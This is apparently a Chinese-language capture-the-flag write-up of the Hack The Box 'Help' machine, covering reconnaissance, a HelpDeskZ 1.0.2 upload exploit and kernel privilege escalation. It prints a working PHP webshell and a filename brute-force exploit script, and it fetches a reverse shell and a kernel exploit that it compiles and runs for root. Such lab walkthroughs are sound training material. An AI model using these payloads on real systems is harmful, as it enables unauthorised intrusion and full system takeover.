信息收集 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 ┌──(root@kali)-[/home/h4m5t/Desktop/HTB/Help] └─ ┌──(root@kali)-[/home/h4m5t/Desktop/HTB/Help] └─ Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-22 01:33 AEST Nmap scan report for 10.129.230.159 Host is up (0.012s latency). Not shown: 997 closed tcp ports (reset) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.6 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 e5:bb:4d:9c:de:af:6b:bf:ba:8c:22:7a:d8:d7:43:28 (RSA) | 256 d5:b0:10:50:74:86:a3:9f:c5:53:6f:3b:4a:24:61:19 (ECDSA) |_ 256 e2:1b:88:d3:76:21:d4:1e:38:15:4a:81:11:b7:99:07 (ED25519) 80/tcp open http Apache httpd 2.4.18 |_http-server-header: Apache/2.4.18 (Ubuntu) |_http-title: Did not follow redirect to http://help.htb/ 3000/tcp open http Node.js Express framework |_http-title: Site doesn't have a title (application/json; charset=utf-8). Service Info: Host: 127.0.1.1; OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 13.91 seconds
目录爆破
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 ┌──(root@kali)-[/home/h4m5t/Desktop/HTB/Help] └─ _|. _ _ _ _ _ _|_ v0.4.3 (_||| _) (/_(_|| (_| ) Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 Wordlist size: 220545 Output File: /home/h4m5t/Desktop/HTB/Help/reports/http_help.htb/_24-09-24_12-53-02.txt Target: http://help.htb/ [12:53:02] Starting: [12:53:03] 301 - 306B - /support -> http://help.htb/support/ [12:53:04] 301 - 309B - /javascript -> http://help.htb/javascript/
或者使用gobuster
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 ┌──(root@kali)-[/home/h4m5t/Desktop/HTB/Help] └─ =============================================================== Gobuster v3.6 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart) =============================================================== [+] Url: http://help.htb [+] Method: GET [+] Threads: 10 [+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt [+] Negative Status codes: 404 [+] User Agent: gobuster/3.6 [+] Timeout: 10s =============================================================== Starting gobuster in directory enumeration mode =============================================================== /support (Status: 301) [Size: 306] [--> http://help.htb/support/] /javascript (Status: 301) [Size: 309] [--> http://help.htb/javascript/]
或使用ffuf, 只显示成功的请求,并将扫描的输出结果同时显示在终端并保存到 scan_results.txt 文件中。
1 ffuf -u http://help.htb/FUZZ -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -mc 200,301,302 | tee scan_results.txt
文件上传 根据爆破的目录,找到一个上传点:
1 http://help.htb/support/
上传phpshell提示文件类型不允许,但其实文件已经上传成功。
1 2 3 4 5 6 7 8 9 10 ┌──(root@kali)-[/home/h4m5t/Desktop/HTB/Help] └─ ------------------------------------------------ --------------------------------- Exploit Title | Path ------------------------------------------------ --------------------------------- HelpDeskZ 1.0.2 - Arbitrary File Upload | php/webapps/40300.py HelpDeskZ < 1.0.2 - (Authenticated) SQL Injecti | php/webapps/41200.py Helpdeskz v2.0.2 - Stored XSS | php/webapps/52068.txt ------------------------------------------------ --------------------------------- Shellcodes: No Results
1 2 3 4 5 6 7 8 9 ┌──(root@kali)-[/home/h4m5t/Desktop/HTB/Help] └─ Exploit: HelpDeskZ 1.0.2 - Arbitrary File Upload URL: https://www.exploit-db.com/exploits/40300 Path: /usr/share/exploitdb/exploits/php/webapps/40300.py Codes: N/A Verified: False File Type: ASCII text Copied to: /home/h4m5t/Desktop/HTB/Help/40300.py
优化修改后的Exp:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 import hashlibimport timeimport requestsimport datetimeimport sysprint ('Helpdeskz v1.0.2 - Unauthenticated shell upload exploit' )if len (sys.argv) < 2 : print (f"Usage: {sys.argv[0 ]} [nameOfUploadedFile]" ) sys.exit(1 ) helpdeskzBaseUrl = 'http://help.htb/support/uploads/tickets/' fileName = sys.argv[1 ] r = requests.get(helpdeskzBaseUrl) currentTime = int ((datetime.datetime.strptime(r.headers['date' ], '%a, %d %b %Y %H:%M:%S %Z' ) - datetime.datetime(1970 , 1 , 1 )).total_seconds()) for x in range (0 , 500 ): plaintext = fileName + str (currentTime - x) md5hash = hashlib.md5(plaintext.encode()).hexdigest() url = helpdeskzBaseUrl + md5hash + '.php' response = requests.head(url) if response.status_code == 200 : print ('Found!' ) print (url) sys.exit(0 ) print ('Sorry, I did not find anything' )
上传文件phpshell.php
1 <?php system ($_GET ['cmd' ]); ?>
上传后运行exp脚本,结果如下:
1 2 3 4 5 ┌──(root@kali)-[/home/h4m5t/Desktop/HTB/Help] └─ Helpdeskz v1.0.2 - Unauthenticated shell upload exploit Found! http://help.htb/support/uploads/tickets/13985c5cd0fa35388f56480d778564b5.php
浏览器输入:
1 http://help.htb/support/uploads/tickets/13985c5cd0fa35388f56480d778564b5.php?cmd=id
结果:
1 uid=1000(help ) gid=1000(help ) groups =1000(help ),4(adm),24(cdrom),30(dip),33(www-data),46(plugdev),114(lpadmin),115(sambashare)
RCE利用成功。
下载一个功能更强大的php-reverse-shell
1 wget https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/refs/heads/master/php-reverse-shell.php
修改php脚本中的IP为tun0的IP地址
本地开启nc监听:
上传php-reverse-shell,并使用exp脚本:
拿到user_flag:
1 2 $ cat /home/help/user.txt 2df113fbcfc65a5889ca9a2932054c9b
Tips: There are at least two exploitable vulnerabilities in HelpDeskZ 1.0.2. There’s an authenticated SQL injection that will allow you to read a SHA1 hash from the database and crack it, allowing for SSH access. There’s also an arbirtray file upload vulnerability that will allow you to upload a webshell and get execution that way. Either way, you end up with a shell as the same user.
稳定shell 这个 shell 可能是非交互式的,无法使用完整的终端功能(例如不能使用箭头键或者 tab 自动补全)。为了稳定它,可以使用以下命令使 shell 更加交互式:
在目标机器的 shell 中,执行以下命令来获取伪终端:
1 python -c 'import pty; pty.spawn("/bin/bash")'
如果目标机器上有 Python 3,使用:
1 python3 -c 'import pty; pty.spawn("/bin/bash")'
一般情况下到这里就可以了,不用继续。
在攻击者端(Netcat session),按下 Ctrl + Z 将会话挂起。
注意,需要先将kali的zsh切换为bash!,如果使用zsh,可以将下面的命令链接起来:
设置终端模式:
然后按 Enter 键,获得一个更稳定的交互 shell。
最后,在目标机器上执行以下命令,设置终端环境:
现在拥有了目标机器的 Shell,接下来可以进行以下操作:
枚举系统信息 :
枚举权限 :
提权 :
如果当前 shell 权限有限,你可能想通过一些提权技术来获得 root 权限。你可以搜索系统是否存在已知的提权漏洞,或者利用 misconfiguration(如 SUID 位、错误配置的 Cron Jobs 等)进行提权。
提权 使用LinEnum.sh提权检查脚本(攻击机使用httpserver,目标机wget下载)
1 2 3 wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh chmod +x LinEnum.sh./LinEnum.sh | tee LinEnum-results.txt
version 0.982
Example: ./LinEnum.sh -s -k keyword -r report -e /tmp/ -t
OPTIONS:
-k Enter keyword
-e Enter export location
-t Include thorough (lengthy) tests
-s Supply current user password to check sudo perms (INSECURE)
-r Enter report name
-h Displays this help text
注意,如果需要要目标机下载log文件到本地进行分析,可以在目标机使用:
1 2 3 python -m SimpleHTTPServer 8080 python3 -m http.server 8080
或使用uname -a 查看系统版本
1 2 help @help :/$ uname -aLinux help 4.4.0-116-generic
查到exp
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 ┌──(root@kali)-[/home/h4m5t/Desktop/HTB/Help] └─ --------------------------------------------------------- --------------------------------- Exploit Title | Path --------------------------------------------------------- --------------------------------- Linux Kernel < 4.4.0-116 (Ubuntu 16.04.4) - Local Privil | linux/local/44298.c --------------------------------------------------------- --------------------------------- Shellcodes: No Results ┌──(root@kali)-[/home/h4m5t/Desktop/HTB/Help] └─ Exploit: Linux Kernel < 4.4.0-116 (Ubuntu 16.04.4) - Local Privilege Escalation URL: https://www.exploit-db.com/exploits/44298 Path: /usr/share/exploitdb/exploits/linux/local/44298.c Codes: CVE-2017-16995 Verified: False File Type: C source , ASCII text Copied to: /home/h4m5t/Desktop/HTB/Help/44298.c
在kali启动http.server
在靶机wget下载文件并编译:
1 2 help @help :/tmp$ wget http://10.10.14.9:8000/44298.chelp @help :/tmp$ gcc 44298.c -o 44298
运行,提权成功:
1 2 3 4 5 6 help @help :/tmp$ ./44298 task_struct = ffff88003b502a00 uidptr = ffff880037300784 spawning root shell root@help :/tmp e0226c44b138c223f11148228acb9517
参考 https://www.youtube.com/watch?v=axxCpCTmu_k
https://0xdf.gitlab.io/2019/06/08/htb-help.html#
